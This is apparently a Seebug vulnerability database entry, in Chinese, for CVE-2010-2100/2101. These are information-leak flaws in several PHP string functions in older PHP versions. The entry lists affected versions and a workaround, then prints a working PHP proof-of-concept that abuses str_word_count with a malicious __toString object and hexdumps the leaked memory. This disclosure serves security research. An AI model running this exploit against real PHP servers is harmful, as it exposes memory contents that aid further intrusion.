Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:19722
HistoryJun 01, 2010 - 12:00 a.m.

PHP 多个函数中断处理地址信息泄露漏洞

2010-06-0100:00:00
Root
www.seebug.org
18

0.007 Low

EPSS

Percentile

78.3%

JSON

CVE ID: CVE-2010-2101
CVE ID: CVE-2010-2100

PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。

PHP的str_pad()函数、str_word_count()函数、wordwrap()函数、strtok()函数、setcookie()函数、strip_tags()函数、strtr()函数中存在信息泄露漏洞

PHP <= 5.3.2
PHP <= 5.2.13
临时解决方法:

  • 禁用call time pass by reference功能。

厂商补丁:

PHP

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.php.net


                                                &lt;?php
class charlist
{
    function __toString()
    {
        $ret = '';
        for ($i=0; $i&lt;=255; $i++) $ret .= chr($i);
        
        /* now the magic */
        parse_str(&quot;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx=1&quot;, $GLOBALS['var']);
        return $ret;
    }
}

/* Detect 32 vs 64 bit */
$i = 0x7fffffff;
$i++;
if (is_float($i)) {
    $GLOBALS['var'] = str_repeat(&quot;A&quot;, 39);
} else {
    $GLOBALS['var'] = str_repeat(&quot;A&quot;, 67);      
}

/* Trigger the Code */
$x = str_word_count(&amp;$GLOBALS['var'], 1, new charlist());
hexdump($x);

/* Helper function */
function hexdump($x)
{
    $l = strlen($x);
    $p = 0;

    echo &quot;Hexdump\n&quot;;
    echo &quot;-------\n&quot;;

    while ($l &gt; 16) {
        echo sprintf(&quot;%08x: &quot;,$p);
        for ($i=0; $i&lt;16; $i++) {
            echo sprintf(&quot;%02X &quot;, ord($x[$p+$i]));
        }
        echo &quot;  &quot;;
        for ($i=0; $i&lt;16; $i++) {
            $c = ord($x[$p+$i]);
            echo ($c &lt; 32 || $c &gt; 127) ? '.' : chr($c);
        }
        $l-=16;
        $p+=16;
        echo &quot;\n&quot;;
    }
    if ($l &gt; 0)
    echo sprintf(&quot;%08x: &quot;,$p);
    for ($i=0; $i&lt;$l; $i++) {
        echo sprintf(&quot;%02X &quot;, ord($x[$p+$i]));
    }
    for ($i=0; $i&lt;16-$l; $i++) { echo &quot;-- &quot;; }

    echo &quot;  &quot;;
    for ($i=0; $i&lt;$l; $i++) {
        $c = ord($x[$p+$i]);
        echo ($c &lt; 32 || $c &gt; 127) ? '.' : chr($c);
    }
    echo &quot;\n&quot;;
}
?&gt;

Related

cve 2
prion 2
seebug 3
ubuntucve 2
openvas 6
nessus 8
securityvulns 1
gentoo 1
cve
cve
CVE-2010-2101
2010-05-27 22:30:00
CVE-2010-2100
2010-05-27 22:30:00
prion
prion
Design/Logic Flaw
2010-05-27 22:30:00
Design/Logic Flaw
2010-05-27 22:30:00
seebug
seebug
PHP htmlentities()和htmlspecialchars()函数中断处理地址信息泄露漏洞
2010-05-31 00:00:00
PHP http_build_query()函数中断处理地址信息泄露漏洞
2010-05-31 00:00:00
PHP str_getcsv()函数中断处理地址信息泄露漏洞
2010-05-31 00:00:00
ubuntucve
ubuntucve
CVE-2010-2101
2010-05-27 00:00:00
CVE-2010-2100
2010-05-27 00:00:00
openvas
openvas
PHP < 5.2.14 Multiple Vulnerabilities
2012-06-21 00:00:00
PHP < 5.2.14 Multiple Vulnerabilities
2020-08-17 00:00:00
PHP < 5.3.3 Multiple Vulnerabilities
2012-06-21 00:00:00
nessus
nessus
PHP 5.2 < 5.2.14 Multiple Vulnerabilities
2010-08-04 00:00:00
PHP 5.3 < 5.3.3 Multiple Vulnerabilities
2010-08-04 00:00:00
SuSE 10 Security Update : Linux kernel (ZYPP Patch Number 7110)
2010-10-11 00:00:00
securityvulns
securityvulns
[ GLSA 201110-06 ] PHP: Multiple vulnerabilities
2011-10-12 00:00:00
gentoo
gentoo
PHP: Multiple vulnerabilities
2011-10-10 00:00:00

0.007 Low

EPSS

Percentile

78.3%

JSON
Related for SSV:19722
cve2prion2seebug3ubuntucve2openvas6nessus8securityvulns1gentoo1